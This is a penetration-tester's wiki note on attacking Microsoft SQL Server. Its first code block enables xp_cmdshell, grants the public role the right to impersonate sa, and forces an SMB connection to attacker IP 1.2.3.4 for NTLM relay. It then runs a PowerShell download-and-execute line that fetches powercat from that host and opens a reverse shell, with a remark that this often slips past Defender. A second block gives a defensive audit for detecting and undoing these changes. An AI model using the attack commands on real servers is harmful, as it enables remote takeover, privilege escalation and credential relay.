# MS SQL

## Useful Metasploit modules

![[Metasploit MS SQL modules|spells/Metasploit MS SQL modules]]

## xp\_cmdshell

MS SQL includes the `xp_cmdshell` "extended" stored procedure, which runs an operating-system shell command from inside the database. It is disabled by default, but if it has been enabled it can be called from a trigger to provide persistence tied to database activity. [[Powercat]], a re-implementation of [[netcat]] in pure PowerShell, is useful here.

```sql
-- Enable MS SQL "advanced options" (needed before xp_cmdshell can be toggled) --
sp_configure 'Show Advanced Options', 1;
RECONFIGURE;

-- Enable the xp_cmdshell stored procedure --
sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- OPTIONAL: Allow all users to impersonate the "sa" (database
-- administrator) login (this enables low-privilege website users
-- to run xp_cmdshell) --
USE master;
GRANT IMPERSONATE ON LOGIN::sa TO [public];

-- Coerce MS SQL into connecting over SMB to an attacker at
-- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't
-- turned on, that is). --
EXEC master.sys.xp_dirtree '\\1.2.3.4\share', 1, 1;

-- Download and execute Powercat from an attacker at 1.2.3.4
-- (using the built-in Python web server) and connect back to
-- that IP on port 1337. Note that this in general should be
-- caught by IDS/IDP systems, including Defender... But I've
-- actually had it work for me out-of-the-box a surprising
-- number of times. --
EXEC master.sys.xp_cmdshell 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://1.2.3.4:8000/powercat.ps1''); powercat -c 1.2.3.4 -p 1337 -e cmd.exe"';
```
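The flip side for a defender or a post-engagement clean-up: the T-SQL audit below (an added example, not part of the original note) checks the catalog views for each state the snippet above leaves behind, namely `xp_cmdshell` switched on, `IMPERSONATE` granted on logins, and triggers whose bodies reference `xp_cmdshell` or `xp_dirtree`, and then turns the procedure back off. It assumes a login with `VIEW SERVER STATE`/sysadmin rights and that it is run against the database where the trigger persistence is suspected.

```sql
-- 1. Is xp_cmdshell (or the advanced-options gate in front of it) enabled?
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Which principals may impersonate which logins? A row for [public]
--    on sa is exactly the GRANT from the persistence snippet.
SELECT grantee.name AS grantee,
       target.name  AS impersonated_login,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 3. DML/database triggers in the current database whose body calls
--    xp_cmdshell or xp_dirtree. '_' is a LIKE wildcard, hence [_].
--    parent_id is 0 for database-level (DDL) triggers, so the table name is NULL there.
SELECT OBJECT_NAME(t.parent_id) AS parent_table,
       t.name                   AS trigger_name,
       t.is_disabled,
       m.definition
FROM sys.triggers AS t
JOIN sys.sql_modules AS m ON m.object_id = t.object_id
WHERE m.definition LIKE '%xp[_]cmdshell%'
   OR m.definition LIKE '%xp[_]dirtree%';

-- 4. Server-scoped (DDL / LOGON) triggers, which live in separate views.
SELECT t.name AS trigger_name, t.is_disabled, m.definition
FROM sys.server_triggers AS t
JOIN sys.server_sql_modules AS m ON m.object_id = t.object_id
WHERE m.definition LIKE '%xp[_]cmdshell%'
   OR m.definition LIKE '%xp[_]dirtree%';

-- 5. Remediate: disable xp_cmdshell again and close the advanced-options gate.
--    (Any trigger or IMPERSONATE grant found above still needs dropping/revoking by name.)
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 3 only sees the database it runs in, so loop it over every user database; `sys.dm_exec_sessions` or the SQL Server error log will not retroactively show `xp_cmdshell` calls unless auditing was already configured.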